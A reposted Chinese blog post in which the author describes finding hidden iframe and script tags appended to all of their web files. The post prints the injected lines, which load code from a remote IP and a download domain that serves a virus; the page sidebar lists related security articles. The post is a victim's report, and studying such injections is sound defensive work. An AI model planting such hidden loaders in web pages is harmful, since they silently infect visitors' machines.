网页设计的代码中被插入了恶意代码

最新推荐文章于 2023-02-13 17:15:51 发布
最新推荐文章于 2023-02-13 17:15:51 发布
阅读量155 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/liuzhengliang/archive/2007/10/22/933715.html
版权
      一个非常奇怪的现象,在我电脑中所有的网页文件(html,asp,aspx等等)在最后几行都被加入了以下代码:
<iframe src="http://222.208.183.246/htm/jh.htm" width="0" height="0" frameborder="0"></iframe>
<script src="http://222.208.183.246/ad/ad.js"></script>
<script src="http://222.208.183.246/ad/ad.js"></script>
<script src="http://222.208.183.246/ad/ad.js"></script>
      在网上找了一些资料,具体如下:
      据查,IP 222.208.183.246 所指向的网站是21CN两性宽屏,执行该段代码后会自动下载一个JScript 脚本文件,该脚本文件是一个可以在客户端运行的语言程序,用记事本打开该文件,里面有一段代码 “document.write("<iframe src='http://down.136136.net/htm/' width='0' height='0' scrolling='no' frameborder='0'></iframe>")”。这段代码会自动执行,并打开“down.136136.net/htm”网页。但是我们并不能看到该网页,因为它被设置成隐藏的。该网页会自动下载病毒,你打开这个网页,瑞星监控会提示你有病毒,但是杀不了。如果你试图打开down.136136.net,会被警告您无权查看该网页,www.136136.net指向的却是大名鼎鼎的百度。如果你不小心打开了有上面代码的网页,恭喜你,你中标了,这就是为什么你打开某个网页会中毒的原因了。
    怎么样将那个讨厌的尾巴去掉,还在摸索当中.

转载于:https://www.cnblogs.com/liuzhengliang/archive/2007/10/22/933715.html

weixin_30532369
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor扩展上传文件、源码高亮,插入Flash、媒体及视频及集成轻开平台
05-20
轻开平台基于汉语的思维方式并巧妙地结合英文思维方式的优点设计了一套轻松Easy的开发规则,用java语言开发实现为一个强大的开发平台,为开发者提供了一个直接轻松面向应用的开发环境。 轻开平台同时支持使用多个...
解决前端恶意代码侵入的一些思考
speedoooo的博客
11-07 1600
沙箱技术有很多种类,是否能称之为“安全沙箱”,则视乎其隔离的程度和自身的技术目的。例如能模拟出一整台服务器或者桌面电脑的虚拟机,应该能称之为安全沙箱 - 你可以在里面跑企业服务、也可以在里面打游戏,并不能影响宿主的安全稳定运行,你也可以把这个虚拟机一键删除,不管里面安装了什么东西。
网站一直被篡改首页文件index以及indax怎么办
网站安全专家
03-16 6319
近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果点击公司网站,打开后跳转到别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们公司网站上,给公司带来很大的影响,领导让尽快解决这个问题。这样的问题已经连续出现3次了找了建站公司也没有解决,反复篡改首页,比如今天我把文件删除替换掉后本地的备份文件,第二天立马...
【HTML】解决恶意script脚本输入问题
weixin_42973143的博客
02-13 193
HTML script 安全验证**程序永远不可以相信用户的输入。**
scdeface-5:污损或污损是通过在网站服务器上插入文件来更改网站外观的活动。 由于网站上存在安全漏洞,因此可以执行此技术
05-12
包含数百种恶意代码,称其为后门。 乍一看类似于计算机病毒。 ac客正在寻找网络的漏洞,如果发现漏洞/漏洞,他们就会开始使用sc进行操作,并且网站的首页显示会更改为sc视图。 接下来是什么?...通常,他们会向...
scdeface-1:污损或污损是通过在网站服务器上插入文件来更改网站外观的活动。 由于网站上存在安全漏洞,因此可以执行此技术
05-12
包含数百种恶意代码,称其为后门。 乍一看类似于计算机病毒。 ac客正在寻找网络的漏洞,如果发现漏洞/漏洞,他们就会开始使用sc进行操作,并且网站的首页显示会更改为sc视图。 接下来是什么?...通常,他们会向...
scdeface-4:污损或污损是通过在网站服务器上插入文件来更改网站外观的活动。 由于网站上存在安全漏洞,因此可以执行此技术
05-12
包含数百种恶意代码,称其为后门。 乍一看类似于计算机病毒。 ac客正在寻找网络的漏洞,如果发现漏洞/漏洞,他们就会开始使用sc进行操作,并且网站的首页显示会更改为sc视图。 接下来是什么?...通常,他们会向...
超漂亮的淘宝客商城网源码
05-05
方便的网页扩展功能,主页底部要添加任何文字、图片或代码(例如加入百度搜索框、添加网站ICP备案信息),均可放入“网页扩展”,无需修改源代码。 强大的广告管理功能,网店标志、大小横幅、广告图片、侧边对联...
HTML恶意代码的实验步骤.pdf
07-11
HTML恶意代码的实验步骤.pdf 学习资料 复习资料 教学资源
让别人点击就加你qq的网页链接代码
04-20
让别人点击就加你qq的网页链接代码,只要把html改为txt就可以看代码
html自动添加恶意代码,HTML恶意代码
weixin_30418225的博客
05-30 734
利用网页进行攻击是非常难以防范的,目前尚没有什么特别有效的方法可以防范,如果有,也要以牺牲很多功能作为代价。所谓恶意网页主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页H T M L超文本标记语言内的Java Applet小应用程序,JavaScript脚本语言程序,ActiveX控件部件等可自动执行的代码程序,强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取...
html恶意代码原理,HTML恶意代码
weixin_39939665的博客
06-03 743
很难阻止使用网页进行攻击. 当前,没有特别有效的方法来防止它. 如果这样做,它还必须牺牲很作为代价.所谓的恶意网页主要被软件或系统操作平台安全漏洞所利用,并且可以通过执行嵌入在HTML超文本标记语言的Java Applet小程序,JavaScript脚本程序,ActiveX控件等来自动执行. 网页代码程序,强行修改用户操作系统的注册表设置和系统实用配置程序,或非法控制系统资源来窃取用户文件,或恶...
html自动添加恶意代码,过滤html恶意代码
weixin_36040444的博客
05-30 127
/*** 转义HTML特殊字符*/public static final String trunhtml(String html){if(html == null)return null;final StringBuilder newhtml = new StringBuilder("");final char[] chararray = html.toCharArray();for(char c...
恶意html代码
KarlDoenitz的专栏
08-09 3213
第一步:把如下代码加入 区域 <!---hide--- function pop(){ for(i=1;i<=3;i++){ window.open('icq.htm','','width=400,height=460','status=off','location=off','toolbar=off','scrollbars
html注册xss防注入代码,防止恶意代码注入XSS(cross site scripting)
weixin_33504929的博客
06-09 229
防止恶意代码注入XSS(cross site scripting)发布时间:2020-06-05 10:32:55来源:51CTO阅读:570作者:津沙港湾栏目:数据库Login.PHP页面html>登录页面用户名密码LoginController.PHP页面html>登录验证//接收用户提交的用户名和密码(login.php页面提交的参数)$username=$_REQUEST[...
html注入跨站攻击脚本,跨站脚本攻击(XSS)
weixin_39888180的博客
06-23 1759
跨站脚本攻击(XSS)是一种客户端代码注入攻击。攻击者通过在合法的网页注入恶意代码,达到在受害者的浏览器执行恶意代码的目的。当受害者访问执行恶意代码的网页时,攻击就开始了。这些网页成为了将恶意代码发送到用户浏览器的工具。通常受到跨站脚本攻击的网页包括论坛、留言板以及可以评论的网页。如果网页将用户的原始输入作为网页内容,那么它很容易受到 XSS 攻击,因为这类用户输入一定会被受害者的浏览器解析。...
在网页插入视频的代码
最新发布
06-06
插入视频的代码可以根据不同的视频平台和网页语言而有所不同。以下是一些常见的示例: 使用 YouTube 视频嵌入代码: ``` <iframe width="560" height="315" src="https://www.youtube.com/embed/视频ID" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> ``` 其,“视频ID”是指要嵌入的 YouTube 视频的唯一标识符。 使用 Vimeo 视频嵌入代码: ``` <iframe src="https://player.vimeo.com/video/视频ID" width="560" height="315" frameborder="0" allow="autoplay; fullscreen" allowfullscreen></iframe> ``` 其,“视频ID”是指要嵌入的 Vimeo 视频的唯一标识符。 使用 HTML5 video 标签: ``` <video width="560" height="315" controls> <source src="视频文件URL" type="video/mp4"> Your browser does not support the video tag. </video> ``` 其,“视频文件URL”是指要嵌入的视频文件的 URL 地址。 请注意,以上示例的宽度和高度参数可以根据需要进行调整,以适应您网页的布局和设计。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值